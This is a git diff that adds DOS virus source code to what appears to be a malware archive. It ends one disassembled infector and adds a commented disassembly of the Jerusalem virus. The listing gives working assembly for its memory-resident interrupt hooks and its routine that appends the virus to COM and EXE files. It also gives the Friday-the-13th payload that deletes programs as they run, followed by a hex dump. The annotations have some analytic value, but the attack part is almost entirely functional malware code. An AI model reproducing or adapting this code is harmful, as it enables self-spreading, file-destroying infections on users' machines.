Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx +loc_35: + jc loc_37 ; Jump if carry Set + mov word ptr ds:data_11e,1984h + mov ax,ds:data_9e + mov ds:data_3e,ax + mov ax,ds:data_10e + mov ds:data_2e,ax + mov ax,ds:data_12e + mov ds:data_4e,ax + mov ax,ds:data_13e + mov ds:data_5e,ax + mov ax,ds:data_7e + cmp word ptr ds:data_6e,0 + je loc_36 ; Jump if equal + dec ax +loc_36: + mul word ptr ds:data_14e ; ax = data * ax + add ax,ds:data_6e + adc dx,0 + add ax,0Fh + adc dx,0 + and ax,0FFF0h + mov ds:data_16e,ax + mov ds:data_17e,dx + add ax,710h + adc dx,0 +loc_37: + jc loc_39 ; Jump if carry Set + div word ptr ds:data_14e ; ax,dxrem=dx:ax/data + or dx,dx ; Zero ? + jz loc_38 ; Jump if zero + inc ax +loc_38: + mov ds:data_7e,ax + mov ds:data_6e,dx + mov ax,ds:data_16e + mov dx,ds:data_17e + div word ptr ds:data_15e ; ax,dxrem=dx:ax/data + sub ax,ds:data_8e + mov ds:data_13e,ax + mov word ptr ds:data_12e,0C5h + mov ds:data_9e,ax + mov word ptr ds:data_10e,710h + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset +loc_39: + jc loc_40 ; Jump if carry Set + mov cx,1Ch + mov dx,4Fh + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_40: + jc loc_41 ; Jump if carry Set + cmp ax,cx + jne loc_42 ; Jump if not equal + mov dx,ds:data_16e + mov cx,ds:data_17e + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset +loc_41: + jc loc_42 ; Jump if carry Set + xor dx,dx ; Zero register + mov cx,710h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_42: + cmp word ptr cs:data_44e,0 + je loc_43 ; Jump if equal + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg +loc_43: + cmp word ptr cs:data_37e,0FFFFh + je loc_44 ; Jump if equal + mov bx,cs:data_37e + mov dx,cs:data_39e + mov cx,cs:data_40e + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + lds dx,dword ptr cs:data_42e ; Load 32 bit ptr + mov cx,cs:data_38e + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + lds dx,dword ptr cs:data_27e ; Load 32 bit ptr + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx +loc_44: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf ; Pop flags + jmp dword ptr cs:data_25e + db 11 dup (0) + db 4Dh, 63h, 21h, 4 + db 13 dup (0) + db 5Bh, 0, 0, 0, 2Bh, 0 + db 0FFh + db 17 dup (0FFh) + db 'E:\SV\EXECDOS.BAT' + db 0 + db 'EXECDOS', 0Dh + db 0, 7Dh, 0, 0, 80h, 0 + db 53h, 0Eh, 5Ch, 0, 53h, 0Eh + db 6Ch, 4Dh, 63h, 21h, 0, 10h + db 'EC=F:\DOS\C' + db 0E9h, 92h, 0, 73h, 55h, 4Dh + db 73h, 44h, 6Fh, 73h, 0, 1 + db 0B8h, 22h, 0, 0, 0, 1Ah + db 3, 2Ch, 2, 70h, 0 +loc_45: + xchg ax,dx + push cs + sub [bp+si],bx +;* jmp short loc_46 ;*(0781) + db 0EBh, 4 + db 63h, 21h, 0D0h, 59h +int_21h_entry endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusale.asm b/MSDOS/Virus.MSDOS.Unknown.jerusale.asm new file mode 100644 index 00000000..da7d7a43 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerusale.asm @@ -0,0 +1,790 @@ +CODE SEGMENT +;The following is a disassembled, structured and commented listing of the +;Jerusalem .COM and .EXE infector virus. All comments, structure inclusions +; +; INTERPATH +; 4423 Cheeney Street +; Santa Clara, CA 95054 + +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ; COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE + JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? + PUSH CX ;*** COMMENTS SOLICITED **** + PUSH SI ; + MOV CX,4001H ; + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C 